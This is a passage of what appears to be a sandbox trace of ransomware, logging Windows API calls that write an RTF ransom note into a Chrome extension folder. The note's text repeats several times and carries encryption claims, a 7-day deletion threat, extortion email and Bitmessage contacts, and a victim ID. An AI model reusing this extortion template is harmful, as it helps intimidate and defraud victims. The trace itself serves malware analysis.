r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0280.877] WriteFile (in: hFile=0x2cc, lpBuffer=0x1eeaaa8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eeaaa8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.878] CloseHandle (hObject=0x2cc) returned 1 [0280.878] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\#readme_eman#.rtf")) returned 0xffffffff [0280.878] GetLastError () returned 0x2 [0280.878] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0280.878] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.878] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.878] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 